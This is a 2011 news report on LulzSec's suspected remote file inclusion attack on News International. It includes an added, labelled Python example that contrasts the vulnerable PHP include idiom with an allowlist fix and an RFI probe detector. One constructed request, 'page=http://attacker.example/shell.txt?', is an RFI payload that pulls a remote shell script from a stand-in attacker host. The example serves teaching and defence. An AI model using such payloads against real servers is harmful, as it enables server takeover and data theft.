21 Jul 2011
As many as one in four web sites could be taken over in the same way as LulzSec members are believed to have infiltrated News International's servers this week to post a fake Sun story about the death of Rupert Murdoch, according to experts.
On Tuesday night, LulzSec hackers are believed to have exploited a remote file inclusion (RFI) flaw on a mothballed internal server which had been hosting the 'new-times.co.uk' domain.
An RFI vulnerability arises when a web application includes a file named by user-supplied input without validating it. Where the server is configured to fetch includes over the network, an attacker can point that input at a script hosted on their own site and have the victim's server execute it, which typically hands them complete control of the server. Gaining access to the server in question could have made it easy for the hackers to then access The Sun's content management system.
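To make the flaw concrete, the following is an added example (not code from the original article or from News International's systems) that models the classic PHP idiom `include($_GET['page'] . '.php')` on a server with remote includes enabled, alongside the allowlist fix that the OWASP guidance referred to later in the piece recommends, and a simple check for RFI probes of the kind a log review or scan would look for. The directory path, page names and attacker host are constructed assumptions; nothing is fetched over the network, the resolvers only return what the server would have loaded.

```python
"""Remote file inclusion (RFI): the vulnerable include pattern beside its fix.

Constructed example. It models the PHP idiom
    include($_GET['page'] . '.php');
on a server where remote includes are enabled, so a URL supplied as
`page` is fetched and executed as server-side code. No network access
is made here; each resolver returns the path or URL the server *would*
include.
"""
from typing import Optional
from urllib.parse import parse_qs, urlsplit

TEMPLATE_DIR = "/var/www/site/pages"          # assumed layout
ALLOWED_PAGES = {"home", "news", "contact"}   # assumed allowlist


def _page_param(query_string: str) -> str:
    """Return the raw `page` query parameter (empty string if absent)."""
    return parse_qs(query_string).get("page", [""])[0]


def vulnerable_include_target(query_string: str) -> str:
    """Resolve `page` exactly as the unsafe idiom does: concatenate and include.

    Whatever the client sends is used verbatim, so a remote URL becomes
    the include target. The trailing '?' in the classic payload turns the
    appended '.php' into a query string on the attacker's URL, so the
    remote script is still fetched as written.
    """
    return _page_param(query_string) + ".php"


def hardened_include_target(query_string: str) -> Optional[str]:
    """Only include pages from a fixed allowlist, mapped to fixed paths.

    Returns None for anything not on the list; the caller should respond
    404 rather than try to 'clean' the input, since filtering 'http://'
    and '../' piecemeal is what keeps getting bypassed.
    """
    page = _page_param(query_string)
    if page not in ALLOWED_PAGES:
        return None
    return f"{TEMPLATE_DIR}/{page}.php"


def is_remote_include_attempt(query_string: str) -> bool:
    """Flag a request whose `page` value carries a URL scheme and host.

    This is the signature of an RFI probe and is worth alerting on when
    reviewing web-server access logs or scanner output.
    """
    parts = urlsplit(_page_param(query_string))
    return parts.scheme in {"http", "https", "ftp"} and bool(parts.netloc)


if __name__ == "__main__":
    # Constructed requests: one legitimate, one classic RFI payload.
    for qs in ("page=home", "page=http://attacker.example/shell.txt?"):
        print(qs)
        print("  vulnerable includes:", vulnerable_include_target(qs))
        print("  hardened includes:  ", hardened_include_target(qs))
        print("  RFI attempt:        ", is_remote_include_attempt(qs))
```

The hardened version does not try to recognise bad input; it only recognises good input, which is why an allowlist rather than a blocklist is the standard fix for this class of bug.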
Although the hacking method has yet to be confirmed, LulzSec in particular is well known for exploiting RFI flaws in its hacks, according to a researcher from a security firm who declined to be named.
"The sad thing is that a quarter of sites could be taken over like this. So many sites have these vulnerabilities," he told V3. "Most of the things that have been said about this hack, though, are pure speculation."
The researcher complained that much of what had been said in a recent article in The Guardian, in particular relating to how the hackers obtained a large dump of News International emails, was "bull".
Jason Steer, EMEA senior solutions architect at security firm Veracode, agreed that an RFI flaw is the most likely way LulzSec managed to post the fake Sun story.
"The flaw is fairly well documented. It was an OWASP top 10 in 2007, and it's fairly easy for developers to fix," he told V3.
"If you're a hacker you don't go for the hard stuff, you go for the easiest [relatively unpatched] systems."
John Stock, senior security consultant at Outpost 24, argued that 99 per cent of RFI flaws are down to poor coding, and that companies need to pay more attention to scanning their systems for such vulnerabilities.
"An SQL injection flaw is bad, as it can enable hackers to get the data out, but file inclusion is even worse. You can take over the server and still have access to that data," he told V3.
Stock urged developers to consult OWASP on secure coding practices.
"I don't think anyone should put anything on the internet without checking them first. News International spent millions on its [security] and yet OWASP is free."